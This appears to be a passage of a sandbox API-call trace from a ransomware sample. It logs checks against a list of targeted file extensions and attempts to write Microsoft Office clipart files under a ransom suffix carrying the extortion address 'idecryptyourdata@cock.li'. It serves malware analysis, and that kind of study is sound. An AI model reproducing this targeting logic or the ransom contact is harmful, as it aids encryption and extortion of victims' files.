[0174.974] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0174.974] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0174.974] lstrlenW (lpString="J0143748.GIF") returned 12 [0174.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.975] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=4561) returned 1 [0174.975] CloseHandle (hObject=0x4c4) returned 1 [0174.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif")) returned 0x220 [0174.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.976] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.976] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.976] CloseHandle (hObject=0x4c4) returned 1 [0174.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.977] lstrlenW (lpString=".doc") returned 4 [0174.977] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0174.977] lstrlenW (lpString=".docx") returned 5 [0174.977] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1 [0174.977] lstrlenW (lpString=".pdf") returned 4 [0174.977] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0174.977] lstrlenW (lpString=".xls") returned 4 [0174.977] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0174.977] lstrlenW (lpString=".xlsx") returned 5 [0174.977] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1 [0174.977] lstrlenW (lpString=".ppt") returned 4 [0174.977] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0174.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.977] lstrlenW (lpString=".zip") returned 4 [0174.977] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0174.977] lstrlenW (lpString=".rar") returned 4 [0174.977] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0174.977] lstrlenW (lpString=".bz2") returned 4 [0174.977] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0174.977] lstrlenW (lpString=".7z") returned 3 [0174.977] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0174.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.977] lstrlenW (lpString=".dbf") returned 4 [0174.978] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0174.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.978] lstrlenW (lpString=".1cd") returned 4 [0174.978] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0174.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.978] lstrlenW (lpString=".jpg") returned 4 [0174.978] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0174.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.978] lstrlenW (lpString=".doc") returned 4 [0174.978] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0174.978] lstrlenW (lpString=".docx") returned 5 [0174.978] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1 [0174.978] lstrlenW (lpString=".pdf") returned 4 [0174.978] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0174.978] lstrlenW (lpString=".xls") returned 4 [0174.978] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0174.978] lstrlenW (lpString=".xlsx") returned 5 [0174.978] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1 [0174.978] lstrlenW (lpString=".ppt") returned 4 [0174.978] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0174.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.979] lstrlenW (lpString=".zip") returned 4 [0174.979] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0174.979] lstrlenW (lpString=".rar") returned 4 [0174.979] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0174.979] lstrlenW (lpString=".bz2") returned 4 [0174.979] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0174.979] lstrlenW (lpString=".7z") returned 3 [0174.979] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0174.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.979] lstrlenW (lpString=".dbf") returned 4 [0174.979] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0174.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.979] lstrlenW (lpString=".1cd") returned 4 [0174.979] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0174.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned 81 [0174.979] lstrlenW (lpString=".jpg") returned 4 [0174.979] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0174.979] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0174.980] lstrlenW (lpString="J0143749.GIF") returned 12 [0174.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.980] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=4899) returned 1 [0174.980] CloseHandle (hObject=0x4c4) returned 1 [0174.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif")) returned 0x220 [0174.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.981] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.981] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.981] CloseHandle (hObject=0x4c4) returned 1 [0174.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF") returned 81 [0174.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF") returned 81 [0174.981] lstrlenW (lpString=".doc") returned 4 [0174.981] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0174.981] lstrlenW (lpString=".docx") returned 5 [0174.981] lstrcmpiW (lpString1=".docx", lpString2="9.GIF") returned -1 [0174.981] lstrlenW (lpString=".pdf") returned 4 [0174.981] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0174.981] lstrlenW (lpString=".xls") returned 4 [0174.981] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0174.982] lstrlenW (lpString=".xlsx") returned 5 [0174.982] lstrcmpiW (lpString1=".xlsx", lpString2="9.GIF") returned -1 [0174.982] lstrlenW (lpString=".ppt") returned 4 [0174.982] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0174.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF") returned 81 [0174.982] lstrlenW (lpString=".zip") returned 4 [0174.982] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0174.982] lstrlenW (lpString=".rar") returned 4 [0174.982] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0174.982] lstrlenW (lpString=".bz2") returned 4 [0174.982] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0174.982] lstrlenW (lpString=".7z") returned 3 [0174.982] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0174.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF") returned 81 [0174.982] lstrlenW (lpString=".dbf") returned 4 [0174.982] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0174.983] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.983] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143750.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.983] CloseHandle (hObject=0x4c4) returned 1 [0174.984] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.984] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143752.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.984] CloseHandle (hObject=0x4c4) returned 1 [0174.985] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.985] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143753.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.985] CloseHandle (hObject=0x4c4) returned 1 [0174.986] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.986] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143754.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.986] CloseHandle (hObject=0x4c4) returned 1 [0174.987] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.987] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143758.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.987] CloseHandle (hObject=0x4c4) returned 1 [0174.988] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.988] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00516l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.988] CloseHandle (hObject=0x4c4) returned 1 [0174.989] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.989] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00531l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.989] CloseHandle (hObject=0x4c4) returned 1 [0174.990] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.990] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00673l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.990] CloseHandle (hObject=0x4c4) returned 1 [0174.991] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.991] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00703l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.992] CloseHandle (hObject=0x4c4) returned 1 [0174.992] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.992] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00760l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.993] CloseHandle (hObject=0x4c4) returned 1 [0174.994] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.994] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00780l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.994] CloseHandle (hObject=0x4c4) returned 1 [0174.995] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.995] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb01741l.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.995] CloseHandle (hObject=0x4c4) returned 1 [0174.996] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.996] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02039_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.997] CloseHandle (hObject=0x4c4) returned 1 [0174.997] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.997] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02055_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.998] CloseHandle (hObject=0x4c4) returned 1 [0174.998] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.998] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02073_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.999] CloseHandle (hObject=0x4c4) returned 1 [0175.000] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.000] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02074_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.000] CloseHandle (hObject=0x4c4) returned 1 [0175.406] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.406] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02077_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.406] CloseHandle (hObject=0x52c) returned 1 [0175.864] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.865] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.excelmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excelmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, 